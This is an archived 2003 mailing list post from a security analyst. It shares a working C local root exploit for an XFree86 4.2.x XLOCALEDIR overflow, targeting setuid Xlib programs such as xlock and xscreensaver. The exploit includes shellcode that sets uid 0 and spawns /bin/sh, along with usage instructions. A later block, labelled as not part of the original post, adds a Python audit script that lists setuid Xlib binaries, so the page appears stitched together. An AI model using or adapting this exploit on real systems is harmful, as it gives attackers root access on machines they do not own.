Vulnerability Development mailing list archives
Re: xscreensaver exploit for Redhat 7.3
From: Inode <inode () mediaservice net>
Date: Fri, 07 Mar 2003 21:45:51 +0100
Hi all, exploit attached. Comments are welcome.

Sincerely,

Agazzini Maurizio                 Tel: +39-011-32.72.100
Security Analyst                  Fax: +39-011-32.46.497
@ Mediaservice.net S.R.L.         D.S.D. Data Security Division

PGP Key : http://www.wayreth.eu.org/Inode.asc
Disclaimer: http://@Mediaservice.net/disclaimer
/*
** Original exploit:
** oC-localX.c - XFree86 Version 4.2.x local root exploit
** By dcryptr && tarranta / oC
**
** This exploit is a modified version of the original oC-localX.c
** built to work without any offset.
**
** Some distros have the file /usr/X11R6/bin/dga +s.
** This program isn't exploitable because it drops privileges
** before running the Xlib function vulnerable to this overflow.
**
** This exploit works on Linux x86 on all distros.
**
** Tested on:
** - Slackware 8.1 (xlock, xscreensaver, xterm)
** - Redhat 7.3 (manual +s to xlock)
** - Suse 8.1 (manual +s to xlock)
**
** by Inode <inode () mediaservice net>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Linux x86 payload passed in the environment:
   setresuid(0,0,0), then execve("/bin//sh"), then exit(0). */
static char shellcode[] =
    /* setresuid(0,0,0); */
    "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
    /* /bin/sh execve(); */
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
    /* exit(0); */
    "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

#define ALIGN 0

int main(int argc, char **argv)
{
    char buffer[6000];              /* becomes the oversized XLOCALEDIR variable */
    unsigned int ret;               /* computed stack address of the shellcode string */
    char *env[3] = { buffer, shellcode, NULL };
    unsigned int *ap;
    char *end;

    strcpy(buffer, "XLOCALEDIR=");

    printf("\nXFree86 4.2.x Exploit modified by Inode <inode () mediaservice net>\n\n");

    if (argc != 3) {
        printf(" Usage: %s <full path> <name>\n", argv[0]);
        printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n", argv[0]);
        return 1;
    }

    /* No offset needed: the kernel places the environment strings at the top
       of the stack, so the shellcode (the last environment string, followed
       only by the program path) lands at a predictable address computed
       backwards from 0xbffffffa. */
    ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

    /* Fill the rest of the buffer with copies of ret.  The original loop
       counted sizeof(buffer) words starting at buffer+11 and ran 11 bytes
       past the end of the array; this bound stays inside it and leaves room
       for the terminating NUL the environment string needs. */
    ap  = (unsigned int *)(buffer + ALIGN + strlen(buffer));
    end = buffer + sizeof(buffer) - sizeof(ret) - 1;
    while ((char *)ap <= end)
        *ap++ = ret;
    *(char *)ap = '\0';

    execle(argv[1], argv[2], NULL, env);
    perror("execle");               /* only reached if the target could not be started */
    return 0;
}
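As an added defensive check that is not part of the original post: the overflow only matters in programs that are both setuid and use Xlib (the post names xlock, xscreensaver, xterm and dga), so an audit that lists such binaries tells an administrator where to drop the +s bit. The script below is hypothetical example code; it looks for the libX11 soname string inside each setuid file instead of calling ldd, which is an assumed heuristic rather than a full ELF parse, and it treats setgid as equally interesting.

```python
"""Audit a directory tree for setuid/setgid binaries that link against Xlib.

Heuristic (assumption, not a full ELF parse): the dynamic string table of an
ELF that needs Xlib contains the soname prefix "libX11.so", so the string is
searched for directly.  This keeps the check offline and dependency-free.
"""
import os
import stat

XLIB_SONAME = b"libX11.so"   # DT_NEEDED entry for Xlib starts with this


def is_setuid(path):
    """True if path is a regular file carrying the setuid or setgid bit."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def links_xlib(path):
    """True if the file is an ELF image whose contents mention libX11's soname."""
    with open(path, "rb") as f:
        data = f.read()
    return data.startswith(b"\x7fELF") and XLIB_SONAME in data


def find_setuid_xlib(root):
    """Return the sorted paths under root that are privileged and link Xlib."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if is_setuid(path) and links_xlib(path):
                    hits.append(path)
            except OSError:
                continue   # unreadable file: skip it rather than abort the audit
    return sorted(hits)


if __name__ == "__main__":
    import sys
    # /usr/X11R6/bin is the XFree86 binary directory named in the post.
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr/X11R6/bin"
    for hit in find_setuid_xlib(root):
        print(hit)
```

Each path printed is a candidate for `chmod u-s,g-s` unless the program is known to drop privileges before touching Xlib, as the post says dga does.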
Current thread:
- Re: xscreensaver exploit for Redhat 7.3 Inode (Mar 07)
- RE: xscreensaver exploit for Redhat 7.3 Adam Gilmore (Mar 08)
- Re: xscreensaver exploit for Redhat 7.3 H D Moore (Mar 10)
- RE: xscreensaver exploit for Redhat 7.3 Adam Gilmore (Mar 10)
- Re: xscreensaver exploit for Redhat 7.3 H D Moore (Mar 10)
- RE: xscreensaver exploit for Redhat 7.3 Adam Gilmore (Mar 08)
